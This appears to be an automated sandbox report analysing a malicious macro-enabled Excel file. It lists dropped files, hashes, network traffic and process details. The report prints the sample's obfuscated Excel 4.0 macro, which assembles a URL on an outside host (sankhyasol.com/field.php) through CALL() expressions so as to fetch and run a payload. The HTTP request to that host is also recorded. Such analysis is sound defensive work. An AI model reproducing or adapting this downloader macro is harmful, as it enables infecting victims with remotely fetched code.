    Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
    C:\Users\user\AppData\Local\Temp\D8DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):80447
    Entropy (8bit):7.8853212587074335
    Encrypted:false
    SSDEEP:1536:Wag5hUkpDwa8AeWviIWXWGHwlMVGoIahaDHTU6hryF70Ng:WagckpDYAiIWXW2w2sTU2yF70m
    MD5:FF71B72DC713F5B0302778515EF12EF1
    SHA1:180666F55365875BCD729461742051D2F898DB21
    SHA-256:68E03DFAD51D5314D9A1CB4A65865C3DC9D5D3114E7A4B4A45A86B904C20145F
    SHA-512:69658B736B5AD386D21D6A28C722DBD474685A50AFAFDF178925A70787BD6E66C1F46DE83A70A6C8E4426B970FD0DAB0B156843E75E7E20BD860D9034F85BE3B
    Malicious:false
    Preview: .U.N.0..#....(q.J..5e.c.Hp?..._......n(P..Q.....9g...O/;..W.AZS..jB.0..i.5..t[.%E.......,!......i. ..6.&m....[.,T..Hc.f....:..l..l29...&.1q.......bq...*.g.Z.KR5.:..8.D.n..]."...*l..sJr....../e.Bd..Z.....F!E...,...q...P<0..F..S......j;I.R..:...-@.4.......cL....(ed..u....E.m.H.....K[..L.U....y..R..~c..^.............d..Q..2..?..<|.d....q. ..e.V]..Rn....=...O.3..<.go)....^..h.....o].6.a|..;hB....G...:...;..nt&H...1.M.6........PK..........!.9...............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Apr 6 19:50:40 2021, atime=Tue Apr 6 19:50:40 2021, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.482791870363173
    Encrypted:false
    SSDEEP:12:85QYcLgXg/XAlCPCHaXgzB8IB/EoVrUX+WnicvbOdlbDtZ3YilMMEpxRljKiTdJU:85lK/XTwz6IqjYeqvDv3q/rNru/
    MD5:4C87C222CEAE1F744F247D527A5D617C
    SHA1:F00D194359C9DE32B1ECBC31405B3B4C18CB3DCC
    SHA-256:E788E7B7301914EF6D3F68CA761C77F8AF0AAC30B5DC5348F62F14DEBA65F62E
    SHA-512:833A31109800144FDD207EA0A0ABA01CE286DECBDDE2319CAB0C35741B30AE593D7891E84ADCF9119919827587F32904865F05AC2A8BCB5F1EE6C74C6B70A05D
    Malicious:false
    Preview: L..................F...........7G...@^.&+...@^.&+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......RU...Desktop.d......QK.X.RU.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_1605962083_895739149.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Tue Apr 6 19:50:40 2021, atime=Tue Apr 6 19:50:40 2021, length=80447, window=hide
    Category:dropped
    Size (bytes):2238
    Entropy (8bit):4.531183274475057
    Encrypted:false
    SSDEEP:48:8Di/XT3IkEj4JZHpIjR/Qh2Di/XT3IkEj4JZHpIjR/Q/:8Di/XLIkEjKp8R/Qh2Di/XLIkEjKp8Ro
    MD5:0965ADECBC8EAF693F71384E42E1E091
    SHA1:D2895F0CAEC9D6D8FEC337584023C0727D5EA0C9
    SHA-256:FAC1A574B888EECFB50BB0DBC6BCA1402D198B95CFC484948CE8CAD6D3F7EC4F
    SHA-512:23802B72BE82955F2EF3D8E845AF33ADFF4734645C7013D32F00FFD8C6538B89248A41F8B182F44D27E4B8C68BBF73FE8BAFF96B8C1F7B1FB2D1097B26D3AAF5
    Malicious:false
    Preview: L..................F.... ....mC..{....W.&+...@^.&+..?:...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.t:...RQ. .DOCUME~1.XLS..t.......Q.y.Q.y*...8.....................D.o.c.u.m.e.n.t.s._.1.6.0.5.9.6.2.0.8.3._.8.9.5.7.3.9.1.4.9...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Documents_1605962083_895739149.xlsm.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.1.6.0.5.9.6.2.0.8.3._.8.9.5.7.3.9.1.4.9...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):145
    Entropy (8bit):4.8294227144552035
    Encrypted:false
    SSDEEP:3:oyBVomxWqds9UfUQD14o5S/9UfUQD14omxWqds9UfUQD14ov:dj/KUhh4ySlUhh4/KUhh4y
    MD5:C2C383724036C4A4C7928281EA1739D6
    SHA1:65BE5AD41863C36977E4038CC88852B6537421AD
    SHA-256:1CC389A2A63C14B73001DC431D2E4E196E1CFBD3ACC685915EAC9B92D74A3684
    SHA-512:3D714C83283E442D05B61CF8CFDB6B01372181B75A43471281C4C5557B7845DFE6692B8991CE0C103169796C9F03F2087CFBBBD6ACF8E02E1559836FDF7D10A6
    Malicious:false
    Preview: Desktop.LNK=0..[misc]..Documents_1605962083_895739149.LNK=0..Documents_1605962083_895739149.LNK=0..[misc]..Documents_1605962083_895739149.LNK=0..
    C:\Users\user\Desktop\89DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):80447
    Entropy (8bit):7.8853212587074335
    Encrypted:false
    SSDEEP:1536:Wag5hUkpDwa8AeWviIWXWGHwlMVGoIahaDHTU6hryF70Ng:WagckpDYAiIWXW2w2sTU2yF70m
    MD5:FF71B72DC713F5B0302778515EF12EF1
    SHA1:180666F55365875BCD729461742051D2F898DB21
    SHA-256:68E03DFAD51D5314D9A1CB4A65865C3DC9D5D3114E7A4B4A45A86B904C20145F
    SHA-512:69658B736B5AD386D21D6A28C722DBD474685A50AFAFDF178925A70787BD6E66C1F46DE83A70A6C8E4426B970FD0DAB0B156843E75E7E20BD860D9034F85BE3B
    Malicious:false
    Preview: .U.N.0..#....(q.J..5e.c.Hp?..._......n(P..Q.....9g...O/;..W.AZS..jB.0..i.5..t[.%E.......,!......i. ..6.&m....[.,T..Hc.f....:..l..l29...&.1q.......bq...*.g.Z.KR5.:..8.D.n..]."...*l..sJr....../e.Bd..Z.....F!E...,...q...P<0..F..S......j;I.R..:...-@.4.......cL....(ed..u....E.m.H.....K[..L.U....y..R..~c..^.............d..Q..2..?..<|.d....q. ..e.V]..Rn....=...O.3..<.go)....^..h.....o].6.a|..;hB....G...:...;..nt&H...1.M.6........PK..........!.9...............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\Desktop\~$Documents_1605962083_895739149.xlsm
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):330
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
    MD5:96114D75E30EBD26B572C1FC83D1D02E
    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
    Malicious:true
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.88644231921371
    TrID:
    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
    • ZIP compressed archive (8000/1) 16.67%
    File name:Documents_1605962083_895739149.xlsm
    File size:80500
    MD5:77941203a3ef209ec6b53d47f0b6d5c0
    SHA1:a2c4f211a8007a6c1def18ab10722edd235a5a70
    SHA256:05ec137601fe0cb3bb5605a55df59e9e03cff966b43e545910cd12030bfca456
    SHA512:21ab17439a8ccd89134e6beb9640c209d03643f1ae572a2807851ce48f0f5eea4c442f6e554850703d9817be22a998040ce52ff7de375bbd823b0d255a0d80ca
    SSDEEP:1536:EYwxIP2YdDB3AeWOiX0mT/WGH+lMVGoIahaDHTU6hryF70w:EYwxIP2YRB3Ri1/W2+2sTU2yF70w
    File Content Preview:PK..........!.9...............[Content_Types].xml ...(.........................................................................................................................................................................!!..............................

    File Icon

    Icon Hash:e4e2aa8aa4bcbcac

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "Documents_1605962083_895739149.xlsm"

    Indicators

    Has Summary Info:
    Application Name:
    Encrypted Document:
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:

    Macro 4.0 Code

    =HALT()
    "=""""&""""&""""&""""&""""&CALL(Docs1!BM23&Docs1!BM24&Docs1!BM25,Docs1!BO23&Docs1!BO24&Docs1!BO25,Docs1!BQ23&Docs1!BQ24,0,Docs1!BR23&Docs1!BR24,Docs1!BP9,0,0)=Docs4!AR8()"
    ,,ht,,tp://,,sankhyasol.com/field.,,php,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&CALL(Docs1!BN13&Docs1!BN14,Docs1!BP13&Docs1!BP14&Docs1!BP15&Docs1!BP16&Docs1!BP17,Docs1!BR13&Docs1!BR14&Docs1!BR15,0,BC6&BC7&BC8&BC9,Docs1!BP9,0,0)=ACOS(45415151)=ATAN2(485,45151)=""""&""""&""""&""""&""""&""""&""""&Docs3!AN14()",,

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    04/06/21-13:50:47.395799TCP1201ATTACK-RESPONSES 403 Forbidden8049165148.66.138.148192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Apr 6, 2021 13:50:46.359304905 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:50:46.641935110 CEST8049165148.66.138.148192.168.2.22
    Apr 6, 2021 13:50:46.642035961 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:50:46.642566919 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:50:46.924983025 CEST8049165148.66.138.148192.168.2.22
    Apr 6, 2021 13:50:47.395798922 CEST8049165148.66.138.148192.168.2.22
    Apr 6, 2021 13:50:47.396002054 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:50:52.400693893 CEST8049165148.66.138.148192.168.2.22
    Apr 6, 2021 13:50:52.400763035 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:52:46.207159996 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:52:46.924426079 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:52:48.359724998 CEST4916580192.168.2.22148.66.138.148
    Apr 6, 2021 13:52:51.214715004 CEST4916580192.168.2.22148.66.138.148

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Apr 6, 2021 13:50:46.288646936 CEST5219753192.168.2.228.8.8.8
    Apr 6, 2021 13:50:46.344589949 CEST53521978.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Apr 6, 2021 13:50:46.288646936 CEST192.168.2.228.8.8.80xad13Standard query (0)sankhyasol.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Apr 6, 2021 13:50:46.344589949 CEST8.8.8.8192.168.2.220xad13No error (0)sankhyasol.com148.66.138.148A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • sankhyasol.com

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165148.66.138.14880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Apr 6, 2021 13:50:46.642566919 CEST0OUTGET /field.php HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: sankhyasol.com
    Connection: Keep-Alive
    Apr 6, 2021 13:50:47.395798922 CEST1INHTTP/1.1 403 Forbidden
    Date: Tue, 06 Apr 2021 11:50:46 GMT
    Server: Apache
    X-Powered-By: PHP/7.3.23
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Vary: User-Agent
    Content-Length: 0
    Keep-Alive: timeout=5
    Content-Type: text/html; charset=UTF-8


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    General

    Start time:13:50:37
    Start date:06/04/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fe10000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >